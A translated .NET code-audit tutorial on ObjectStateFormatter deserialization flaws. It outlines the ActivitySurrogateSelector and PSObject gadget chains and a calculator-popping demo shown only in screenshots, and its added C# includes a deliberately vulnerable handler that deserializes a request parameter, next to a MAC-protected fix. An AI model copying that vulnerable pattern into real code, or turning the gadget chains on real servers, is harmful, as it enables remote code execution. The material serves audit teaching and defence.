.NET Advanced Code Audit, Lesson 10: ObjectStateFormatter Deserialization Vulnerability
Author: 佚名 (anonymous), www.myhack58.com (黑吧安全网 vulnerability warning, MYHACK58:62201993711)
Published: Apr 17, 2019

CVSS3: 8.1 High
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK; Attack Complexity: HIGH; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

CVSS2: 9.3 High
AV:N/AC:M/Au:N/C:C/I:C/A:C
Access Vector: NETWORK; Access Complexity: MEDIUM; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

EPSS: 0.198 Low (Percentile: 95.9%)

0x00 Preface
ObjectStateFormatter is generally used to serialize and deserialize object state graphs; the familiar ViewState, for example, is serialized through this class. It lives in the System.Web.UI namespace. Its advantage is that it stores a type table and handles structures such as Pair and Hashtable natively, so serialization is very fast. But deserializing untrusted binary data with it produces a deserialization vulnerability that enables remote code execution (RCE). This article describes and reproduces the problem from the standpoint of both the underlying principle and code audit.
0x01 ObjectStateFormatter serialization
The following serializes an instance with the ObjectStateFormatter class to illustrate the problem. First, define the TestClass object:
![](/Article/UploadPic/2019-4/201941714137450.png)
It defines three members and implements a static method, ClassMethod, which launches a process. Serialization starts by creating an instance of the object and assigning values to its members:
![](/Article/UploadPic/2019-4/201941714138165.png)
As in the conventional BinaryFormatter case, calling Serialize produces the binary content that is written to the file:
![](/Article/UploadPic/2019-4/201941714138757.png)

0x02 ObjectStateFormatter deserialization
2.1 Deserialization usage
Deserialization is the reverse process: it converts the binary data back into an object, by creating a new ObjectStateFormatter and calling its Deserialize method. Looking at the definition, ObjectStateFormatter implements the IFormatter interface:
![](/Article/UploadPic/2019-4/201941714138773.png)
The author creates a new object and calls Deserialize; the concrete implementation is shown in the following code:
![](/Article/UploadPic/2019-4/201941714138430.png)
After deserialization, the value of the Name member of TestClass is recovered:
![](/Article/UploadPic/2019-4/201941714138105.png)
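The serialization step of 0x01 and the deserialization step of 2.1 together, as an added example rather than the article's own code (the article's listing survives only as screenshots). It assumes a .NET Framework project referencing System.Web.dll; the page names only the Name member of TestClass, so Age and Address are placeholders, and ClassMethod is kept harmless instead of launching a process.

```csharp
using System;
using System.IO;
using System.Web.UI;   // ObjectStateFormatter; reference System.Web.dll (.NET Framework)

// Assumed shape of the article's TestClass: only Name is named on the page,
// Age and Address are placeholders. [Serializable] is required, because
// ObjectStateFormatter hands types it does not handle natively to
// BinaryFormatter, which refuses unmarked types.
[Serializable]
public class TestClass
{
    public string Name { get; set; }
    public int Age { get; set; }
    public string Address { get; set; }

    // The article's ClassMethod launches a process; kept harmless here.
    public static void ClassMethod()
    {
        Console.WriteLine("ClassMethod called");
    }
}

public static class OsfRoundTrip
{
    // Serialize(Stream, object) writes the raw binary form to a file, as the
    // article does; Serialize(object) returns the same bytes Base64-encoded.
    public static string SerializeToFile(TestClass obj, string path)
    {
        var fmt = new ObjectStateFormatter();
        using (var fs = File.Create(path))
        {
            fmt.Serialize(fs, obj);
        }
        return fmt.Serialize(obj);
    }

    // Deserialize(Stream) reads the raw binary form back.
    public static TestClass DeserializeFromFile(string path)
    {
        using (var fs = File.OpenRead(path))
        {
            return (TestClass)new ObjectStateFormatter().Deserialize(fs);
        }
    }

    // Deserialize(string) expects the Base64 form and decodes it itself.
    public static TestClass DeserializeFromString(string base64)
    {
        return (TestClass)new ObjectStateFormatter().Deserialize(base64);
    }

    public static void Main()
    {
        string path = Path.Combine(Path.GetTempPath(), "testclass.bin");
        var original = new TestClass { Name = "test", Age = 18, Address = "localhost" };

        string base64 = SerializeToFile(original, path);
        Console.WriteLine("Base64 form: " + base64);

        TestClass fromFile = DeserializeFromFile(path);
        TestClass fromString = DeserializeFromString(base64);
        Console.WriteLine("Name from file:   " + fromFile.Name);
        Console.WriteLine("Name from string: " + fromString.Name);
    }
}
```

Both Deserialize overloads end at the same internal reader, so the file written by Serialize(Stream, object) and the Base64 string returned by Serialize(object) carry identical bytes; the string overload only adds the Base64 decode. Because a plain class like TestClass has no native token in the format, its bytes inside that stream are a nested BinaryFormatter payload, which is exactly what the gadget chains in the next section rely on.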
2.2 Attack vector: ActivitySurrogateSelector
Since the earlier article already introduced the principle of the vulnerability, it is not repeated here; readers who have not seen it should refer to ".NET Advanced Code Audit, Lesson 8: SoapFormatter Deserialization Vulnerability". The difference is only that the data is serialized with the ObjectStateFormatter class; as before, the custom code is reached by overriding ISerializationSurrogate. ObjectStateFormatter handles primitives, strings, Pair/Triplet, arrays, Hashtable and a few other types natively and passes every other [Serializable] type to BinaryFormatter, which is why BinaryFormatter gadget chains such as ActivitySurrogateSelector apply to it as well. The author again uses the calculator for the demo; the generated binary file looks like this when opened:
![](/Article/UploadPic/2019-4/201941714138457.png)
As usual, the data is deserialized with the Deserialize method of ObjectStateFormatter:
![](/Article/UploadPic/2019-4/201941714139257.png)
Deserialization succeeds and pops the calculator, but it also throws an exception; in a web service this surfaces as a 500 error.
![](/Article/UploadPic/2019-4/201941714139183.png)
2.3 Attack vector: PSObject
Because the author's Windows host already has the patch for CVE-2017-8565 (Windows PowerShell remote code execution vulnerability) installed, this vector did not work, so it is not discussed in depth here; interested readers can research it on their own. Patch details:
https://support.microsoft.com/zh-cn/help/4025872/windows-powershell-remote-code-execution-vulnerability

0x03 Code audit perspective
3.1 Deserialize
From the code audit angle, the entry point to look for is Deserialize. It has two overloads, one taking a Stream and one taking a string; the string may be the raw output of Serialize(object) or the same Base64 text read from a file, and both overloads deserialize successfully in practice.
![](/Article/UploadPic/2019-4/201941714139628.png)
The following is unsafe code:
![](/Article/UploadPic/2019-4/201941714139907.png)
An attacker only needs to control the string passed in through the path parameter to trigger the deserialization vulnerability.
The vulnerability can also be triggered with the following unsafe code:
![](/Article/UploadPic/2019-4/201941714139673.png)
Sending the Base64 PoC in the request successfully pops the calculator.
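The unsafe pattern of 3.1 beside a hardened variant, as an added example and not the article's own code. It assumes an ASP.NET application on .NET Framework; the handler names, the "path" parameter and the appSettings key name "stateKey" are placeholders. The hardened handler accepts only state the server itself issued: the token is base64(payload || HMAC-SHA256(key, payload)) and the MAC is verified before any byte reaches the formatter, the same model ViewState uses with its machineKey.

```csharp
using System;
using System.Configuration;
using System.IO;
using System.Security.Cryptography;
using System.Web;
using System.Web.UI;

// Vulnerable pattern, as the article describes it: the "path" request
// parameter goes straight into Deserialize(string). Any type that
// ObjectStateFormatter does not handle natively is handed to
// BinaryFormatter, so a BinaryFormatter gadget chain runs here.
public class VulnerableHandler : IHttpHandler
{
    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext context)
    {
        string payload = context.Request["path"];              // attacker-controlled
        object state = new ObjectStateFormatter().Deserialize(payload);
        context.Response.Write(state == null ? "null" : state.GetType().FullName);
    }
}

// Hardened variant: only server-issued, MAC-protected state is deserialized.
// Leaking the key restores the original RCE, so treat it like machineKey.
public static class StateProtector
{
    const int MacLength = 32; // HMAC-SHA256 output size

    public static string Protect(byte[] key, object stateGraph)
    {
        byte[] payload;
        using (var ms = new MemoryStream())
        {
            new ObjectStateFormatter().Serialize(ms, stateGraph);
            payload = ms.ToArray();
        }
        byte[] mac;
        using (var hmac = new HMACSHA256(key)) mac = hmac.ComputeHash(payload);

        var token = new byte[payload.Length + MacLength];
        Buffer.BlockCopy(payload, 0, token, 0, payload.Length);
        Buffer.BlockCopy(mac, 0, token, payload.Length, MacLength);
        return Convert.ToBase64String(token);
    }

    public static bool TryUnprotect(byte[] key, string token, out object stateGraph)
    {
        stateGraph = null;
        byte[] bytes;
        try { bytes = Convert.FromBase64String(token ?? ""); }
        catch (FormatException) { return false; }
        if (bytes.Length <= MacLength) return false;

        int payloadLength = bytes.Length - MacLength;
        var payload = new byte[payloadLength];
        var mac = new byte[MacLength];
        Buffer.BlockCopy(bytes, 0, payload, 0, payloadLength);
        Buffer.BlockCopy(bytes, payloadLength, mac, 0, MacLength);

        byte[] expected;
        using (var hmac = new HMACSHA256(key)) expected = hmac.ComputeHash(payload);
        if (!FixedTimeEquals(expected, mac)) return false;    // reject before deserializing

        using (var ms = new MemoryStream(payload))
        {
            stateGraph = new ObjectStateFormatter().Deserialize(ms);
        }
        return true;
    }

    // Constant-time comparison so the MAC check is not a timing oracle;
    // CryptographicOperations.FixedTimeEquals does not exist on .NET Framework.
    static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        if (a.Length != b.Length) return false;
        int diff = 0;
        for (int i = 0; i < a.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }
}

public class HardenedHandler : IHttpHandler
{
    // Assumed: the key is a Base64 secret in <appSettings>, never in source.
    static readonly byte[] Key = Convert.FromBase64String(ConfigurationManager.AppSettings["stateKey"]);

    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext context)
    {
        object state;
        if (!StateProtector.TryUnprotect(Key, context.Request["path"], out state))
        {
            context.Response.StatusCode = 400;
            context.Response.Write("invalid state token");
            return;
        }
        context.Response.Write(state == null ? "null" : state.GetType().FullName);
    }
}
```

The MAC does not make ObjectStateFormatter safe; it only guarantees the bytes were produced by the server, so if the client never legitimately needs to round-trip serialized state, the right fix is to remove the endpoint or switch to a format without polymorphic type loading. When auditing, look for every Deserialize(Stream) and Deserialize(string) call whose argument traces back to a request, and remember that a failed gadget still throws, so unexplained 500 errors on such endpoints are worth logging.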
